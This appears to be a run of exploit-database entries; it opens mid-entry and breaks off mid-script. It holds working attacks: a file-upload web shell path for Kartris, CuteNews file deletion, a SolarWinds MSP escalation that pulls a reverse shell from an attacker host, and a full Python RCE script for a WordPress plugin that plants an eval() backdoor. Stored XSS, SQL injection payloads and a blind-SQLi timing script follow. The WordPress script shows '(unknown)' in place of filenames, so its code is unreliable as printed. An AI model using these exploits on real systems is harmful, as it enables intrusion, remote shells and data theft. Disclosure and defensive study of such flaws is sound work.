-----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$_UC_AdminSearch$txtSearch" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$phdMain$hidFileNameToDelete" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$phdMain$filUploader"; filename="malicious.aspx" Content-Type: text/plain [Content Malicious File Here ! ] -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnWidth" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnMinWidth" 170px -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="ctl00$splMainPage$hdnMaxWidth" 500px -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__EVENTTARGET" ctl00$phdMain$lnkUpload -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__EVENTARGUMENT" -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATE" [__VIEWSTATE value omitted - it is page/session specific, copy it from a fresh load of _GeneralFiles.aspx] -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATEGENERATOR" 54DD7DF0 -----------------------------9604487443072642880454762058 Content-Disposition: form-data; name="__VIEWSTATEENCRYPTED" -----------------------------9604487443072642880454762058-- # Access malicious file following the link: https://localhost/uploads/General/malicious.aspx # Note: the request above targets the /Admin/ area and carries the KartrisBackAuth cookie, i.e. it requires an authenticated back-office session. The weakness is that the General Files uploader accepts an .aspx file and stores it under /uploads/General/ inside the web root, where it is then served and executed. # How to fix: Update to the latest version # Commit fix: https://github.com/cactusoft/kartris/commit/e9450dc1f90aa6167f1db1a6f137ea07cacb2a5c
-
CuteNews 2.1.2 - Arbitrary File Deletion
# Exploit Title: CuteNews 2.1.2 - Arbitrary File Deletion # Date: 2020-05-08 # Author: Besim ALTINOK # Vendor Homepage: https://cutephp.com # Software Link: https://cutephp.com/click.php?cutenews_latest # Version: v2.1.2 (Maybe it affect other versions) # Tested on: Xampp # Credit: İsmail BOZKURT # Remotely: Yes Description: ------------------------------------------------------------------------ In the "Media Manager" area, an authenticated user can delete arbitrary files. The filenames submitted in the `rm[]` parameter of the delete action are passed to unlink() without being confined to the media directory, so a traversal value such as `../avatar.png` removes a file outside it. The request below triggers the vulnerability from a low-privileged user account. Arbitrary File Deletion PoC -------------------------------------------------------------------------------- POST /cute/index.php HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 ********************************** Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 222 Origin: http://localhost DNT: 1 Connection: close Referer: http://localhost/cute/index.php Cookie: CUTENEWS_SESSION=3f6a6ea7089e3a6a04b396d382308022 Upgrade-Insecure-Requests: 1 mod=media&opt=media&folder=&CKEditorFuncNum=&callback=&style=&faddm=&imgopts=&__signature_key=27966e9129793e80a70089ee1c3ebfd5-tester&__signature_dsi=0ad6659c2aa31871b0b44617cf0b1200&rm%5B%5D=../avatar.png&do_action=delete
-
SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions
# Title: SolarWinds MSP PME Cache Service 1.1.14 - Insecure File Permissions # Author: Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG # Date: 2020-05-06 # Vendor: https://www.solarwindsmsp.com/ # CVE: CVE-2020-12608 # GitHub: https://github.com/jensregel/Advisories/tree/master/CVE-2020-12608 # CVSSv3: 8.2 [CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H] # CWE: 276 Vulnerable version ================== SolarWinds MSP PME (Patch Management Engine) before 1.1.15 Timeline ======== 2020-04-24 Vulnerability discovered 2020-04-27 Sent details to SolarWinds PSIRT 2020-04-27 SolarWinds confirmed the vulnerability 2020-05-05 SolarWinds released PME version 1.1.15 2020-05-06 Public disclosure Description =========== The SolarWinds MSP Cache Service, which is part of the Advanced Monitoring Agent, ships a configuration file with insecure file permissions; a local low-privileged user can abuse this to obtain code execution as SYSTEM. The SolarWinds MSP Cache Service is typically used to get new update definition files and versions for ThirdPartyPatch.exe or SolarWinds MSP Patch Management Engine Setup. The XML file CacheService.xml in %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\config\ is writable by normal users, so that the parameter SISServerURL can be changed, which controls the location of the updates. After some analysis, we were able to provide modified XML files (PMESetup_details.xml and ThirdPartyPatch_details.xml) that point to an executable file with a reverse TCP payload using our controlled SISServerURL web server for SolarWinds MSP Cache Service. Since the *_details.xml files (and therefore the checksums and size the download is compared against) come from the attacker-controlled server, those checks add no protection; the fact that an unsigned msfvenom binary is downloaded and run suggests no code-signature check is enforced on the component either. Proof of Concept (PoC) ====================== As we can see, NTFS change permissions are set on CacheService.xml by default. Any user on the system who is in the group Users can change the file content. This is especially a big problem on terminal servers or multi-user systems. 
PS C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\config> icacls .\CacheService.xml .\CacheService.xml VORDEFINIERT\Benutzer:(I)(M) NT-AUTORITÄT\SYSTEM:(I)(F) VORDEFINIERT\Administratoren:(I)(F) (German-locale output: VORDEFINIERT\Benutzer is BUILTIN\Users, which holds inherited Modify (M) rights on the file; SYSTEM and BUILTIN\Administrators have Full control (F).) 1. Modify CacheService.xml In the xml file, the parameter SISServerURL was adjusted, which now points to a web server controlled by the attacker. <?xml version="1.0" encoding="utf-8"?> <Configuration> <CachingEnabled>True</CachingEnabled> <ApplianceVersion>1.1.14.2223</ApplianceVersion> <CacheLocation>C:\ProgramData\SolarWinds MSP\SolarWinds.MSP.CacheService\cache</CacheLocation> <CacheSizeInMB>10240</CacheSizeInMB> <SISServerURL>https://evil-attacker.example.org</SISServerURL> <LogLevel>5</LogLevel> <Proxy></Proxy> <ProxyEncrypt>AQAAANCMnd8BFdER(...)</ProxyEncrypt> <ProxyCacheService /> <CacheFilesDeleted></CacheFilesDeleted> <CacheDeletedInBytes></CacheDeletedInBytes> <HostApplication>RMM</HostApplication> <CanBypassProxyCacheService>True</CanBypassProxyCacheService> <BypassProxyCacheServiceTimeoutSeconds>1</BypassProxyCacheServiceTimeoutSeconds> <ComponentUpdateMinutes>300</ComponentUpdateMinutes> <ComponentUpdateDelaySeconds>1</ComponentUpdateDelaySeconds> </Configuration> 2. Payload creation Generate an executable file, for example using msfvenom, that establishes a reverse tcp connection to the attacker and store it on the web server. msfvenom -p windows/x64/shell_reverse_tcp lhost=x.x.x.x lport=4444 -f exe > /tmp/solarwinds-shell.exe 3. Prepare web server Place the modified xml files (PMESetup_details.xml or ThirdPartyPatch_details.xml) on the web server in the path /ComponentData/RMM/1/, calculate MD5, SHA1 and SHA256 checksums of the executable, set the correct value for SizeInBytes and increase the version (the service only fetches a component whose advertised version is newer than the installed one, as the ApplianceVersion above and the Version fields below show). 
Example of PMESetup_details.xml <ComponentDetails> <Name>Patch Management Engine</Name> <Description>Patch Management Engine</Description> <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum> <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum> <SHA256Checksum> 80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65 </SHA256Checksum> <SizeInBytes>7168</SizeInBytes> <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL> <FileName>solarwinds-shell.exe</FileName> <Architecture>x86,x64</Architecture> <Locale>all</Locale> <Version>1.1.14.2224</Version> </ComponentDetails> Example of ThirdPartyPatch_details.xml <ComponentDetails xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"> <Name>Third Party Patch</Name> <Description> Third Party Patch application for Patch Management Engine RMM v 1 and later </Description> <MD5Checksum>7a4a78b105a1d750bc5dfe1151fb70e1</MD5Checksum> <SHA1Checksum>3d9ed6bd44b5cf70a3fed8f511d9bc9273a1feac</SHA1Checksum> <SHA256Checksum> 80579df2533d54fe9cbc87aed80884f6a97e1ccdd0443ce2bcb815ef59ed3d65 </SHA256Checksum> <SizeInBytes>7168</SizeInBytes> <DownloadURL>/ComponentData/RMM/1/solarwinds-shell.exe</DownloadURL> <FileName>solarwinds-shell.exe</FileName> <Architecture>x86,x64</Architecture> <Locale>all</Locale> <Version>1.2.1.95</Version> </ComponentDetails> 4. Malicious executable download After restarting the system or reloading the CacheService.xml, the service connects to the web server controlled by the attacker and downloads the executable file. This is then stored in the path %PROGRAMDATA%\SolarWinds MSP\SolarWinds.MSP.CacheService\cache\ and %PROGRAMDATA%\SolarWinds MSP\PME\archives\. [24/Apr/2020:10:57:01 +0200] "HEAD /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 5307 "-" "-" [24/Apr/2020:10:57:01 +0200] "GET /ComponentData/RMM/1/solarwinds-shell.exe HTTP/1.1" 200 7585 "-" "-" 5. 
Getting shell After some time the executable is run by the SolarWinds MSP RPC Server service and connects back to the attacker with the rights of the SYSTEM account. [~]: nc -nlvp 4444 Listening on [0.0.0.0] (family 0, port 4444) Connection from [x.x.x.x] port 4444 [tcp/*] accepted (family 2, sport 49980) Microsoft Windows [Version 10.0.18363.778] (c) 2019 Microsoft Corporation. Alle Rechte vorbehalten. C:\WINDOWS\system32>whoami whoami nt-authority\system C:\WINDOWS\system32> Fix === The issue is fixed in PME version 1.1.15, which is distributed through auto-update: https://success.solarwindsmsp.com/forum-post/X0D51T00007TMk6jSAD/ Until the update is applied, removing the Modify right of the Users group on CacheService.xml (shown above as (M)) closes the write path.
-
WordPress Plugin Simple File List 4.2.2 - Remote Code Execution
# Exploit Title: Wordpress Plugin Simple File List 4.2.2 - Remote Code Execution
# Date: 2020-04-19
# Exploit Author: coiffeur
# Vendor Homepage: https://simplefilelist.com/
# Software Link: https://wordpress.org/plugins/simple-file-list/
# Version: Wordpress Simple File List <= v4.2.2
#
# Flow: generate() writes a PHP file under a .png name locally, upload()
# posts it to the plugin's upload engine, move() asks the plugin's file
# engine to rename it to .php, and main() confirms the result.  For
# detection, that same request sequence is the signature: a POST to
# ee-upload-engine.php followed by a POST to ee-file-engine.php with
# eeFileAction=Rename|<name>.php.
#
# NOTE(review): the literal "(unknown)" inside several f-strings below looks
# like an extraction artifact where the original interpolated a variable
# (presumably {filename}); as printed, generate() would create a file
# literally named "(unknown)" and upload() would fetch that name back.
# Confirm against the original script before relying on it.

import requests
import random
import hashlib
import sys
import os
import urllib3

urllib3.disable_warnings()

# Plugin paths, relative to the WordPress site root.
dir_path = '/wp-content/uploads/simple-file-list/'                          # where uploads land
upload_path = '/wp-content/plugins/simple-file-list/ee-upload-engine.php'   # upload handler
move_path = '/wp-content/plugins/simple-file-list/ee-file-engine.php'       # rename/move handler


def usage():
    """Print the banner / usage text."""
    banner = """ NAME: Wordpress v5.4 Simple File List v4.2.2, pre-auth RCE SYNOPSIS: python wp_simple_file_list_4.2.2.py <URL> AUTHOR: coiffeur """
    print(banner)


def generate():
    """Write a PHP file under a random .png name and return (filename, password).

    The PHP body only evaluates the posted `cmd` when the posted `password`
    equals the random value generated here; otherwise it prints a fake 404.

    Returns:
        (filename, password): the local file name and the random gate value.
    """
    filename = f'{random.randint(0, 10000)}.png'
    # 20 random bytes hashed with MD5 -- used only as an opaque gate token.
    password = hashlib.md5(bytearray(random.getrandbits(8) for _ in range(20))).hexdigest()
    with open(f'(unknown)', 'wb') as f:  # NOTE(review): see the artifact note at the top
        payload = '<?php if($_POST["password"]=="' + password + \
            '"){eval($_POST["cmd"]);}else{echo "<title>404 Not Found</title><h1>Not Found</h1>";}?>'
        f.write(payload.encode())
    print(f'[ ] File (unknown) generated with password: {password}')
    return filename, password


def upload(url, filename):
    """POST *filename* to the upload engine and verify it is reachable afterwards.

    Args:
        url: site base URL (scheme + host, no trailing slash).
        filename: local file produced by generate().

    Returns:
        filename, unchanged, on success; calls exit(-1) otherwise.
    """
    # NOTE(review): the file handle opened here is never closed.
    files = {'file': (filename, open(filename, 'rb'), 'image/png')}
    # eeSFL_Timestamp / eeSFL_Token are a fixed pair embedded in the script,
    # i.e. not derived from the target -- worth confirming how the endpoint
    # validates them.
    datas = {'eeSFL_ID': 1, 'eeSFL_FileUploadDir': dir_path, 'eeSFL_Timestamp': 1587258885,
             'eeSFL_Token': 'ba288252629a5399759b6fde1e205bc2'}
    r = requests.post(url=f'{url}{upload_path}', data=datas, files=files, verify=False)
    # Success is judged by fetching the file back from the uploads directory,
    # not by inspecting the upload response.
    r = requests.get(url=f'{url}{dir_path}(unknown)', verify=False)
    if r.status_code == 200:
        print(f'[ ] File uploaded at {url}{dir_path}(unknown)')
        os.remove(filename)
    else:
        print(f'[*] Failed to upload (unknown)')
        exit(-1)
    return filename


def move(url, filename):
    """Ask the file engine to rename the uploaded .png to .php.

    Args:
        url: site base URL.
        filename: name returned by upload().

    Returns:
        the new .php file name on success; calls exit(-1) otherwise.
    """
    new_filename = f'{filename.split(".")[0]}.php'
    # Referer and X-Requested-With mimic the plugin's own admin AJAX call.
    headers = {'Referer': f'{url}/wp-admin/admin.php?page=ee-simple-file-list&tab=file_list&eeListID=1',
               'X-Requested-With': 'XMLHttpRequest'}
    datas = {'eeSFL_ID': 1, 'eeFileOld': filename, 'eeListFolder': '/', 'eeFileAction': f'Rename|{new_filename}'}
    r = requests.post(url=f'{url}{move_path}', data=datas, headers=headers, verify=False)
    # Only the HTTP status is checked; a 200 carrying an error body would still pass.
    if r.status_code == 200:
        print(f'[ ] File moved to {url}{dir_path}{new_filename}')
    else:
        print(f'[*] Failed to move (unknown)')
        exit(-1)
    return new_filename


def main(url):
    """Run the full chain against *url* and confirm it with a phpinfo() probe."""
    file_to_upload, password = generate()
    uploaded_file = upload(url, file_to_upload)
    moved_file = move(url, uploaded_file)
    if moved_file:
        print(f'[+] Exploit seem to work.\n[*] Confirmning ...')
        datas = {'password': password, 'cmd': 'phpinfo();'}
        r = requests.post(url=f'{url}{dir_path}{moved_file}', data=datas, verify=False)
        # A 200 whose body contains "php" is taken as confirmation.
        if r.status_code == 200 and r.text.find('php') != -1:
            print('[+] Exploit work !')
            print(f'\tURL: {url}{dir_path}{moved_file}')
            print(f'\tPassword: {password}')


if __name__ == "__main__":
    if (len(sys.argv) < 2):
        usage()
        exit(-1)
    main(sys.argv[1])
-
OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting
# Exploit Title: OpenZ ERP 3.6.60 - Persistent Cross-Site Scripting # Date: 2020-05-11 # Exploit Author: Vulnerability-Lab # Vendor: https://www.openz.de/ # https://www.openz.de/download.html Document Title: =============== OpenZ v3.6.60 ERP - Employee Persistent XSS Vulnerability References (Source): ==================== https://www.vulnerability-lab.com/get_content.php?id=2234 Common Vulnerability Scoring System: ==================================== 4.6 Product & Service Introduction: =============================== https://www.openz.de/ https://www.openz.de/download.html Affected Product(s): ==================== OpenZ Product: OpenZ v3.6.60 - ERP (Web-Application) Vulnerability Disclosure Timeline: ================================== 2020-05-06: Public Disclosure (Vulnerability Laboratory) Technical Details & Description: ================================ A persistent cross-site scripting web vulnerability has been discovered in the official OpenZ v3.6.60 ERP web application. The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector, compromising browser-to-web-application requests from the application side. The persistent vulnerability is located in the `inpname` and `inpdescription` parameters of the `Employee` add/register/edit module in the `menu.html` file. Remote attackers with low privileges are able to inject their own persistent malicious script code as the name or description. The injected code can be used to attack the frontend or backend of the web application. The request method to inject is POST and the attack vector is located on the application side. The attack can be triggered from low-privilege user accounts against higher-privilege accounts such as managers or administrators to elevate privileges via session hijacking.
Successful exploitation of the vulnerabilities results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources, and persistent manipulation of the affected application modules. Request Method(s): [+] POST Vulnerable Module(s): [+] Employee Vulnerable Input(s): [+] Mitarbeiter Name [+] Beschreibung Vulnerable File(s): [+] Menu.html Vulnerable Parameter(s): [+] inpname [+] inpdescription Proof of Concept (PoC): ======================= The persistent web vulnerability can be exploited by a low-privileged web application user account with low user interaction. For security demonstration or to reproduce the vulnerability, follow the provided information and steps below. Manual steps to reproduce the vulnerability ... 1. Open the OpenZ web application 2. Register, add or edit via the profile settings the inpname & inpdescription parameter inputs 3. Edit the inpname & inpdescription parameters of the profile and save the entry Note: The payload executes when the user details are previewed in /org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html 4. The persistent web vulnerability has been reproduced.
--- POC Session Logs [POST] --- (Inject via Add / Edit) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Host: localhost:8080 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Content-Type: application/x-www-form-urlencoded Content-Length: 1464 Origin: https://localhost:8080 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 Command=SAVE_EDIT_RELATION&inpLastFieldChanged=inpdescription&inpkeyColumnIdInp=&inpParentKeyColumn=&inpDirectKey=& inpKeyReferenceColumnName=&inpTableReferenceId=&inpKeyReferenceId=&autosave=N&inpnewdatasetindicator=&inpnewdataseIdVal=& inpenabledautosave=Y&inpisemployee=Y&inpistaxexempt=N&inpadClientId=C726FEC915A54A0995C568555DA5BB3C&inpaAssetId=& inpcGreetingId=&inpcBpartnerId=8BEB3E9FD5D24F9BBCF777A51D53F5AF&inpissummary=N&inprating=N&inpTableId=AC9B98C649CD4F55B37714008EE8519F& inpkeyColumnId=C_BPartner_ID&inpKeyName=inpcBpartnerId&mappingName=/org.openbravo.zsoft.smartui.Employee/ EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html&inpwindowId=39D3CD9F77A942D690965D49106F011B& inpTabId=A3D0B320B69845B386024B5FF6B1E266&inpCommandType=EDIT&updatedTimestamp=20200426170335&inpParentOrganization=& inpadOrgId=1AF9E07685234E0A9FEC1D9B58A4876B&inpadImageId=& inpvalue=325235&inpname=>"><iframe src=evil.source><iframe></iframe></iframe>& inpdescription=>"><iframe src=evil.source><iframe></iframe></iframe>&inpimageurl=31337& inpisactive=Y&inpisinresourceplan=Y&inpapprovalamt=0,00&inpcSalaryCategoryId=&inptaxid=&inpreferenceno=& inpcBpGroupId=42691AE1D13F400AB814B70361E167C3&inpadLanguage=de_DE&inpcountry=Deutschland&inpzipcode=& inpcity=&inpcreated=26-04-2020 17:03:35&inpcreatedby=Service&inpupdated=26-04-2020 
17:03:35&inpupdatedby=Service - POST: HTTP/1.1 302 Found Server: Apache/2.4.38 (Debian) Location: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/EmployeeA3D0B320B69845B386024B5FF6B1E266_Relation.html?Command=RELATION Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 - (Execution in Listing) https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/evil.source Host: myerponline.de Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Connection: keep-alive Referer: https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/SalesRepVendor8BAE92BA22C14B1487EB2B247FA4A977_Edition.html Cookie: JSESSIONID=0692EC25BA33001B002059E182BA1544; _ga=GA1.2.403279990.1587913275; _gid=GA1.2.274268317.1587913275 - GET: HTTP/1.1 200 OK Server: Apache/2.4.38 (Debian) Content-Type: text/html;charset=utf-8 Content-Language: en Content-Length: 1110 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive PoC: Vulnerable Source (/security/Menu.html) <table width="0px" height="0px" cellspacing="0" cellpadding="0"> <tbody><tr> <td><input type="text" class="DataGrid_Table_Dummy_Input" id="grid_table_dummy_input"></td> </tr> </tbody></table> <input type="hidden" name="inpcBpartnerId" value="8BEB3E9FD5D24F9BBCF777A51D53F5AF" id="keyParent"> <div class="RelationInfoContainer"> <table class="RelationInfo"> <tbody><tr> <td class="RelationInfoTitle" id="related_info_cont">Business Partner:</td> <td class="RelationInfoContent" id="paramParentC_BPartner_ID">325235 - >"><iframe src="a"></TD> </TR> Reference(s): https://localhost:8080/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/ https://localhost:8080/openz/org.openbravo.zsoft.smartui.Employee/Employee Credits & Authors: ================== Vulnerability-Lab - https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab Benjamin Kunz Mejri - https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. 
-- VULNERABILITY LABORATORY - RESEARCH TEAM
-
Victor CMS 1.0 - 'post' SQL Injection
# Exploit Title: Victor CMS 1.0 - 'post' SQL Injection # Google Dork: N/A # Date: 2020-05-09 # Exploit Author: BKpatron # Vendor Homepage: https://github.com/VictorAlagwu/CMSsite # Software Link: https://github.com/VictorAlagwu/CMSsite/archive/master.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # my website: bkpatron.com # Discription: # The Victor CMS v1.0 application is vulnerable to SQL injection via the 'post' parameter on the post.php page. # vulnerable file : post.php http://localhost/CMSsite-master/post.php?post=1 Parameter: post (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: post=1 AND 2333=2333 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: post=1 AND (SELECT 4641 FROM(SELECT COUNT(*),CONCAT(0x7178787871,(SELECT (ELT(4641=4641,1))),0x717a627171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: post=1 AND (SELECT 7147 FROM (SELECT(SLEEP(5)))vltp) Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: post=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL-- PTYU [INFO] the back-end DBMS is MySQL web application technology: PHP, Apache 2.4.39, PHP 7.2.18 back-end DBMS: MySQL >= 5.0 # Proof of Concept: http://localhost/CMSsite-master/post.php?post=sqli http://localhost/CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU GET /CMSsite-master/post.php?post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU HTTP/1.1 
Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Cookie: PHPSESSID=gd27m8o57gcb23t7se4d4tdv1g Connection: keep-alive Upgrade-Insecure-Requests: 1 post=1%20UNION%20ALL%20SELECT%20NULL,NULL,NULL,NULL,CONCAT(0x7178787871,0x54487357657079447543667943786c4f7a634a654a707448516e6f6e6241674f4c4a50477164646c,0x717a627171),NULL,NULL--%20PTYU
-
Complaint Management System 1.0 - Authentication Bypass
# Exploit Title: Complaint Management System 1.0 - Authentication Bypass # Google Dork: N/A # Date: 2020-05-10 # Exploit Author: BKpatron # Vendor Homepage: https://www.sourcecodester.com/php/14206/complaint-management-system.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/complaint-management-system.zip # Version: v1.0 # Tested on: Win 10 # CVE: N/A # Vulnerability: An attacker can bypass the login page and reach the dashboard. The payload '=''or' is a classic SQL-injection login bypass, which indicates that the submitted username and password are placed into the login query without escaping or parameterization. # vulnerable file : admin/index.php # Parameter & Payload: '=''or' # Proof of Concept: http://localhost/Complaint%20Management%20System/admin/ POST /Complaint%20Management%20System/admin/ HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 61 Referer: http://localhost/Complaint%20Management%20System/admin/ Cookie:PHPSESSID=6d1ef7ce1b4rgp44ep3iqncfn4 Connection: keep-alive Upgrade-Insecure-Requests: 1 username=%27%3D%27%27or%27&password=%27%3D%27%27or%27&submit=: undefined
-
LibreNMS 1.46 - 'search' SQL Injection
# Exploit Title: LibreNMS 1.46 - 'search' SQL Injection # Google Dork: unknown # Date: 2019-09-01 # Exploit Author: Punt # Vendor Homepage: https://www.librenms.org # Software Link: https://www.librenms.org # Version: 1.46 and earlier # Tested on: Linux and Windows # CVE: N/A # Affected devices: more than 4k found on Shodan and Censys. # Description of the bug Vulnerable script: /html/ajax_search.php if (isset($_REQUEST['search'])) { $search = mres($_REQUEST['search']); header('Content-type: application/json'); if (strlen($search) > 0) { $found = 0; if ($_REQUEST['type'] == 'group') { include_once '../includes/device-groups.inc.php'; foreach (dbFetchRows("SELECT id,name FROM device_groups WHERE name LIKE '%".$search."%'") as $group) { if ($_REQUEST['map']) { $results[] = array( 'name' => 'g:'.$group['name'], 'group_id' => $group['id'], As you can see, there is a search parameter, $search = mres($_REQUEST['search']);, which accepts user input via $_REQUEST[''], and dbFetchRows() is used to execute the SQL query. Now let's check the mres() function, which is located under /includes/common.php: function mres($string) { return $string; // global $database_link; return mysqli_real_escape_string($database_link, $string); As you can see, mres() returns its argument unchanged -- its first statement is `return $string;`, so the mysqli_real_escape_string() code after it is never reached -- and the search value is concatenated into the LIKE clause unescaped. The PoC therefore only needs a URL-encoded single quote (%27). #POC: 1st, log in to your LibreNMS. 2nd, go to /ajax_search.php?search=%27&type=group or /ajax_search.php?search=%27&type=alert-rules 3rd, you will see an SQL syntax error. The LibreNMS team have applied a patch. Thanks, Punt (From Ethiopia)
-
Phase Botnet - Blind SQL Injection
# Phase Botnet - Blind SQL Injection against the panel "gate" script.
# Python 2 script: the `print"...",` statements below are py2 syntax.
# Recovers two rows of the panel's `settings` table (id 1 and id 2, printed
# as "Username" / "Password") one character at a time by timing requests
# that embed SLEEP(): a response that takes at least wait_delay seconds
# means the guessed length / character was right.
# Detection note: bursts of POSTs to the gate URL whose query string carries
# IF(... SLEEP(...) ...) are the signature to alert on.

import requests
import time
import sys

wait_delay = 5  # seconds a SLEEP() probe must add before a guess counts as a hit; raise it on slow links or servers
KnockString = 'g=a&w=a&b=a&d=a&p=a&m=a'  # query-string-shaped knock the gate expects; sent RC4-encrypted (see brute_panel) -- original remark: "lol no integrity verification"
PostData = ""  # filled in by brute_panel() once the knock string is encrypted


def rc4_crypt(data , key):
    """RC4-encrypt/decrypt *data* (a str) with *key* (a str); returns a str.

    Standard RC4: key scheduling over a 256-entry permutation, then the
    keystream generator XORed into each character.  RC4 is symmetric, so the
    same call decrypts.  Characters go through ord()/chr(), so the result is
    byte-oriented only for single-byte strings (py2 str / latin-1 range).
    RC4 is a broken cipher; this merely mirrors what the panel uses.
    """
    S = list(range(256))
    j = 0
    out = []
    # Key-scheduling algorithm (KSA).
    for i in range(256):
        j = (j + S[i] + ord( key[i % len(key)] )) % 256
        S[i] , S[j] = S[j] , S[i]
    i = j = 0
    # Pseudo-random generation algorithm (PRGA), one keystream byte per char.
    for char in data:
        i = ( i + 1 ) % 256
        j = ( j + S[i] ) % 256
        S[i] , S[j] = S[j] , S[i]
        out.append(chr(ord(char) ^ S[(S[i] + S[j]) % 256]))
    return ''.join(out)


def brute_length(url, id):
    """Return the length (0..29) of settings.value for row *id*, or 0 if no guess matched.

    Each iteration sends one request whose injected IF() sleeps only when
    LENGTH(...) equals the guess; elapsed wall-clock time decides.  A true
    length of 0 and "no match" both yield 0 and are indistinguishable.

    NOTE(review): `id` shadows the builtin; `r` is unused; headers='' is not
    a dict -- requests happens to tolerate it because the value is falsy,
    and presumably it suppresses the default headers -- confirm intended.
    """
    for i in range(0, 30):
        Injection = "\"', (IF(LENGTH((SELECT value FROM settings WHERE id='%d')) = %d, SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, i, wait_delay)
        ConnectUrl = url + '?i=' + Injection
        start = time.time()
        r = requests.post(ConnectUrl, data=PostData, headers='')
        end = time.time()
        # Timing oracle: a hit is any request that took at least wait_delay.
        if((end - start) >= wait_delay):
            return i
    return 0


def brute_char(url, position, id):
    """Print the character at 1-based *position* of settings.value for row *id*.

    Tries printable ASCII 32..126; each candidate is echoed over the previous
    one with a backspace, so the character left on screen is the hit (the
    loop breaks on the first timing match).  If nothing matches, the last
    candidate tried ('~') stays on screen -- nothing signals a miss.
    """
    sys.stdout.write(" ")
    sys.stdout.flush()
    for i in range(32, 127):
        Injection = "\"', (IF(SUBSTRING((SELECT value FROM settings WHERE id='%d'), %d, 1) = BINARY CHAR(%d), SLEEP(%d), 0)), 'a', 'a', 'a', 'a', 'a', 'a')-- -" % (id, position, i, wait_delay)
        ConnectUrl = url + '?i=' + Injection
        sys.stdout.write("\b%c" % chr(i))  # overwrite the previous candidate in place
        sys.stdout.flush()
        start = time.time()
